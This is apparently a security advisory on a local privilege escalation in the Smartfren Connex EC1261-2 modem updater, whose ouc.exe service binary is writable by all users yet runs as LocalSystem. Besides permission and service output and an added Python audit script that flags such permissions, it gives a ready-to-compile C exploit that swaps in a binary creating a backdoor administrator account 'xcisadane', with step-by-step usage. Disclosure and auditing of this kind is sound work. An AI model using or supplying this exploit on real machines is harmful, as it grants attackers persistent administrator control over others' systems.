Smartfren Connex EC 1261-2 UI OUC is part of the Smartfren Connex EC USB EVDO Modem files.
Smartfren Connex EC 1261-2 UI OUC is a daemon for updating the USB EVDO Modem files of Smartfren Connex.
Improper file permissions on the application's executable file could result in a local privilege escalation vulnerability.
An unprivileged user can replace the executable file with a binary of their choice.
The binary (ouc.exe) is set by default to run at startup and will be executed with SYSTEM privileges.
Tested on: Microsoft Windows 7 Ultimate 64 Bit (EN).

C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog>cacls ouc.exe
C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog\ouc.exe Everyone:F
        BUILTIN\Users:F
        NT AUTHORITY\SYSTEM:(ID)F
        BUILTIN\Administrators:(ID)F

C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog>sc qc "Smartfren Connex EC1261-2 UI. RunOuc"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Smartfren Connex EC1261-2 UI. RunOuc
        TYPE               : 110 WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2 AUTO_START
        ERROR_CONTROL      : 1 NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog\ouc.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Smartfren Connex EC1261-2 UI. OUC
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
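
A defender-side check for the condition shown in the output above, as an added example that is not part of the original advisory: it parses `sc qc` and `cacls` output and reports unprivileged principals holding write-capable rights on the binary of a LocalSystem service. The list of unprivileged principals, the set of write-capable rights and all function names are assumptions of this example.

```python
import re
# Sample input: the `sc qc` and `cacls` output quoted in this advisory.
SC_QC = r"""
SERVICE_NAME: Smartfren Connex EC1261-2 UI. RunOuc
START_TYPE : 2 AUTO_START
BINARY_PATH_NAME : C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog\ouc.exe
SERVICE_START_NAME : LocalSystem
"""
CACLS = r"""
C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog\ouc.exe Everyone:F
BUILTIN\Users:F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
"""
# Assumptions of this example: who counts as unprivileged, which rights allow overwrite.
LOW_PRIV = {"everyone", "builtin\\users", "nt authority\\authenticated users",
            "nt authority\\interactive"}
WRITE_RIGHTS = {"F", "C", "W"}  # cacls: Full control, Change, Write
ACE = re.compile(r"^(?P<who>.+?):(?:\([A-Z]+\))*(?P<right>[FCRWN])$")

def parse_sc_qc(text):
    """Return the 'KEY : VALUE' lines of `sc qc` output as a dict."""
    parts = (line.partition(":") for line in text.splitlines())
    return {key.strip(): value.strip() for key, sep, value in parts if sep}

def parse_cacls(text, path):
    """Return (principal, right) pairs; cacls prefixes the first ACE with the path."""
    aces = []
    for line in text.splitlines():
        line = line.strip()
        if path and line.lower().startswith(path.lower()):
            line = line[len(path):].strip()
        match = ACE.match(line)
        if match:
            aces.append((match.group("who"), match.group("right")))
    return aces

def audit(sc_text, cacls_text):
    """List unprivileged principals able to overwrite a LocalSystem service binary."""
    cfg = parse_sc_qc(sc_text)
    if cfg.get("SERVICE_START_NAME", "").lower() != "localsystem":
        return []
    # BINARY_PATH_NAME may be quoted or carry arguments; keep only the executable.
    m = re.match(r'"([^"]+)"|(.+?\.exe)', cfg.get("BINARY_PATH_NAME", ""), re.I)
    path = (m.group(1) or m.group(2)) if m else ""
    return [(who, right) for who, right in parse_cacls(cacls_text, path)
            if who.lower() in LOW_PRIV and right in WRITE_RIGHTS]

if __name__ == "__main__":
    print(audit(SC_QC, CACLS))
```

An empty result is what a corrected ACL produces, that is, one where only SYSTEM and Administrators hold F, C or W on ouc.exe.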

The following attack scenario could be used:
You can also do it with this simple program:
------------------------------------- [ CUT HERE ] -------------------------------------------
Compile the script below with Dev-C++.
Save it as C:\sploit.cpp.

#include <stdio.h>
#include <windows.h>

#define DEFAULT_TARGET "C:\\Program Files (x86)\\Smartfren Connex EC1261-2 UI\\UpdateDog\\ouc.exe"
#define DEFAULT_BACKUP "C:\\Program Files (x86)\\Smartfren Connex EC1261-2 UI\\UpdateDog\\ouc.exe.old"
#define DEFAULT_EXECUTE "C:\\bin.exe"

int main(int argc, char *argv[])
{
    MoveFile(DEFAULT_TARGET, DEFAULT_BACKUP);
    CopyFile(DEFAULT_EXECUTE, DEFAULT_TARGET, FALSE);
    return 0;
}

Compile the script below with Dev-C++.
Save it as C:\bin.cpp.

#include <stdio.h>
#include <windows.h>

#define CMD "C:\\WINDOWS\\system32\\cmd.exe"
#define ONE "/C net user xcisadane xcisadane /add"
#define TWO "/C net localgroup administrators xcisadane /add"

int main(int argc, char *argv[])
{
    STARTUPINFO si = {sizeof(STARTUPINFO)};
    PROCESS_INFORMATION pi;
    CreateProcess(CMD, ONE, NULL, NULL, 0, 0, NULL, NULL, &si, &pi);
    CreateProcess(CMD, TWO, NULL, NULL, 0, 0, NULL, NULL, &si, &pi);
    return 0;
}

------------------------------------- [ CUT HERE ] -------------------------------------------
Execute the file sploit.exe, located in C:\
Reboot Windows. After the reboot, check net user from a Command Prompt; if there is a user named xcisadane, the exploit has succeeded.
P.S.: For Win32, change Program Files (x86) to Program Files.